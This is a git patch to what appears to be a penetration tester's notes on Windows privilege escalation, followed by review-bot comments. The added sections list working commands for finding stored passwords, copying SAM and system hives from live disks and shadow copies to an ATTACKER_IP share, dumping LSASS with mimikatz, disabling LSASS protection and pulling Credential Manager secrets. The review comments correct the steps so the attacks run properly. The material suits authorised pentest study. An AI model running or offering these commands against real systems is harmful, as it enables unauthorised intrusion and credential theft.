From 9a18fefd36ab491b3b288260a66c2245fd53ee55 Mon Sep 17 00:00:00 2001 From: whx Date: Thu, 1 Sep 2022 23:52:46 +0200 Subject: [PATCH] added priv esc for windows --- .../priv_esc/docs/windows/windows_priv_esc.md | 120 +++++++++++++++--- 1 file changed, 105 insertions(+), 15 deletions(-) diff --git a/post exploitation/priv_esc/docs/windows/windows_priv_esc.md b/post exploitation/priv_esc/docs/windows/windows_priv_esc.md index eb6e8e4..e6955a6 100644 --- a/post exploitation/priv_esc/docs/windows/windows_priv_esc.md +++ b/post exploitation/priv_esc/docs/windows/windows_priv_esc.md @@ -1,6 +1,7 @@ # Windows Privilege Escalation ## Links + * [Fundamentals](https://www.fuzzysecurity.com/tutorials/16.html) * [PowerShellEmpire](https://github.com/PowerShellEmpire/PowerTools/tree/master/PowerUp) * [JAWS](https://github.com/411Hall/JAWS) @@ -17,9 +18,11 @@ * __System__, local system, final escalation * __Local Service__, got anonymous connections over network. * __Network Service__, default service account, authentication via network + ## Enumeration ### Users & Groups + ```sh whoami /priv net users @@ -35,6 +38,7 @@ qwinsta * [powershell](../../../../enumeration/windows/powershell.md) ### System + ```sh hostname systeminfo | findstr /B /C:"OS Name" /C:"OS Version" 
@@ -48,15 +52,42 @@ wmic product get name,version,vendor wmic service list brief | findstr "Running" ``` +### Logfiles and Registry + +```sh +cmdkey /list +``` +* Keys containing passwords +``` +reg query HKLM /f password /t REG_SZ /s +reg query HKCU /f password /t REG_SZ /s +``` + +### AD Credentials + +* Check AD's NTDS, SYSVOL +* Check user description of AD users +```sh +Get-ADUser -Filter * -Properties * | select Name,SamAccountName,Description +``` + ## Exploit +* __Use found credentials__ +```sh +runas /savecred /user: reverse_shell.exe +``` + ### DLL Hijacking + * [DLL hijacking](../../../../exploit/windows/dll_hijacking/dll_hijacking.md) ### Unquoted Service Path + * [unquoted service path](../../../../exploit/windows/docs/unquoted_path.md) ### Token Impersonation + * `SeImpersonatePrivilege` is necessary, check via `whoami priv` * Hot Potato is best before Server 2019 and Windows 10 (version 1809) * [Potatos](../../../../exploit/windows/docs/potatoes.md) @@ -71,19 +102,6 @@ wmic service list brief | findstr "Running" * [Always install elevated](../../../../exploit/windows/docs/always_installed_elevated.md) -### Search for Credentials -```sh -cmdkey /list -``` -* Use found credentials -```sh -runas /savecred /user: reverse_shell.exe -``` -* Keys containing passwords -``` -reg query HKLM /f password /t REG_SZ /s -reg query HKCU /f password /t REG_SZ /s -``` ### accesschk64 Permissions * Check access to files and folders @@ -98,6 +116,7 @@ accesschk64 -wvu "file.exe" * Any other binary works as well. Copy the compiled portable executable from the `service_escalation` onto the binary path.Restart the service afterwards. #### accesschk64 for Services + ```sh accesschk64 -qlc "service.exe" ``` 
@@ -113,9 +132,11 @@ sc start TheService ``` ### Startup Application + * Put reverse shell instead of an executable inside `C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup` ### Password Mining + * Set up metasploit ```sh use auxiliary/server/capture/http_basic @@ -235,27 +256,39 @@ icacls C:\Path/to/service.exe /grant Everyone:F * `whoami /priv` #### SeBackup / Restore + * If `SeBackup / SeRestore` (rw on all files) is set an elevated `cmd.exe` may be opened * Download `SAM` and `System` hashes ```sh reg save hklm\system C:\Windows\Temp\system.hive reg save hklm\sam C:\Windows\Temp\sam.hive ``` +* or +```sh +copy C:\Windows\System32\config\sam \\ATTACKER_IP\ +``` * Start smb server on attack machine ```sh copy C:\Windows\Temp\sam.hive \\ATTACKER_IP\ copy C:\Windows\Temp\system.hive \\ATTACKER_IP\ ``` + * Dump the hashes ```sh secretsdump.py -sam sam.hive -system system.hive LOCAL ``` +* or meterpreter on target +```sh +hashdump +``` + * Use pass the hash to login ```sh psexec.py -hashes administrator@$TARGET_IP ``` #### SeTakeOwnership + * If `SeTakeOwnership` is set one can take ownership of every file or service. ```sh takeown /f C:\Windows\System32\Utilman.exe @@ -264,9 +297,7 @@ copy cmd.exe utilman.exe ``` * Log out, on the Login screen click on `Ease of Access` - #### SeImpersonate / SeAssignPrimaryToken - * It is a rouge potato * Execute process as another user * Service accounts operate through impersonation 
@@ -277,3 +308,62 @@ socat tcp-listen:135 reuseaddr,fork tcp:$TARGET_IP:1234 ``` * Catch the potatoe executable from target via netcat + +### Volume Shadow Copy Service + +* Take a look at the volumes at +```sh +vssadmin list shadows +``` + +* Copy `sam` and `system` from the shadow copy +```sh +copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1\windows\system32\config\sam \\ATTACKER_IP\ +copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1\windows\system32\config\system \\ATTACKER_IP\ +``` + +### Dump LSASS + +* If administrator permissions are gained, a dump file can be created by opening the task manager and right clicking `lsass.exe` -> `creat dumpfile` +* Use `procdump.exe` from sysinternal suite as an alternative to `tskmgr.exe` + +* Extract the dump via mimikatz +```sh +privilege::debug +sekurlsa::logonpasswords +``` + +### LSASS Protection + +* If the dump cannot be created because it is protected change `RunAsPPL` DWORD to `1` under +```sh +HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Lsa +``` + +* Alternatively use mimikatz +```sh +!+ +!processprotect /process:lsass.exe /remove +``` + +### Windows Credential Manager + +* Can be found via `Control Pane` -> `User Accounts` -> `Credential Manager` +* Alternatively, command line can be used +```sh +vaultcmd /list +vaultcmd /listproperties:"Web Credentials" +vaultcmd /listcreds:"web credentials" +``` + +* Extract the password via powershell script [Get-WebCredentials from nishang](https://github.com/samratashok/nishang/blob/master/Gather/Get-WebCredentials.ps1) +```sh +powershell -ex bypass +Get-WebCredentials +``` + +* Via mimikatz if administrative permissions have been gained +```sh +privilege::debug +sekurlsa::credman +```
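Review bot: in hunk `@@ -48,15 +52,42 @@`, the line `runas /savecred /user: reverse_shell.exe` under "Use found credentials" has no account after `/user:` and cannot run as written; it should name the account whose stored credential `cmdkey /list` revealed, e.g. `runas /savecred /user:DOMAIN\user "C:\path\reverse_shell.exe"`, and the bullet should state that `/savecred` only works when a credential for that user is already saved. In the same hunk the `Get-ADUser ... | select Name,SamAccountName,Description` one-liner is PowerShell (ActiveDirectory module), not `sh`, so the fence tag is misleading, the `reg query` block has no language tag at all, and "Check AD's NTDS, SYSVOL" is too terse to act on (say what is being looked for, e.g. NTDS.dit on a domain controller and credential-bearing Group Policy Preference XML files under SYSVOL). The context line `whoami priv` in the Token Impersonation bullet should read `whoami /priv`, as it does elsewhere on the page.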
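Review bot: in hunk `@@ -235,27 +256,39 @@`, the added alternative `copy C:\Windows\System32\config\sam \\ATTACKER_IP\` does not work on a running system: the SAM hive is held open exclusively and a direct copy fails with a sharing violation, which is exactly why the `reg save hklm\sam` lines above it (and the Volume Shadow Copy section added further down in this patch) exist. Either drop the bullet or reword it to say a direct copy only works from a shadow copy or an offline disk. Two further points in this hunk: the `hashdump` alternative should say it needs a SYSTEM (or at least high-integrity administrative) meterpreter session, and the context line `psexec.py -hashes administrator@$TARGET_IP` is missing the `LMHASH:NTHASH` value that `-hashes` expects before the target. The "Start smb server on attack machine" bullet is also followed directly by the two `copy ... \\ATTACKER_IP\` commands; the SMB server command itself (e.g. impacket's `smbserver.py`) should appear there, before the copies.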
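Review bot: hunk `@@ -264,9 +297,7 @@` only removes the blank lines around the `#### SeImpersonate / SeAssignPrimaryToken` heading, which is inconsistent with the rest of this patch, where blank lines are being added after headings; keep the surrounding blank lines for consistency, and while touching these lines fix `rouge potato` in the context to `Rogue Potato`.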
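Review bot: in hunk `@@ -277,3 +308,62 @@`, the LSASS Protection section has the logic inverted: `RunAsPPL` = `1` under `HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Lsa` is what enables LSA protection, so setting it to `1` will not make the dump possible; to disable it through the registry the value has to be set to `0` (or deleted) and the change only takes effect after a reboot. The mimikatz path (`!+` loads the mimidrv driver, then `!processprotect /process:lsass.exe /remove`) is the no-reboot alternative and should state that it needs administrative rights and loads a kernel driver. Smaller fixes in the same hunk: `creat dumpfile` should read `Create dump file`, `tskmgr.exe` should be `taskmgr.exe`, `Control Pane` should be `Control Panel`; the `vssadmin list shadows` step should say that listing and reading shadow copies needs administrative rights and that, if none exist, one can be created first (`vssadmin create shadow /for=C:` on Server SKUs); the nishang script has to be loaded before `Get-WebCredentials` can be called, e.g. `. .\Get-WebCredentials.ps1`; and the mimikatz console input and the PowerShell commands are fenced as `sh`, which is misleading.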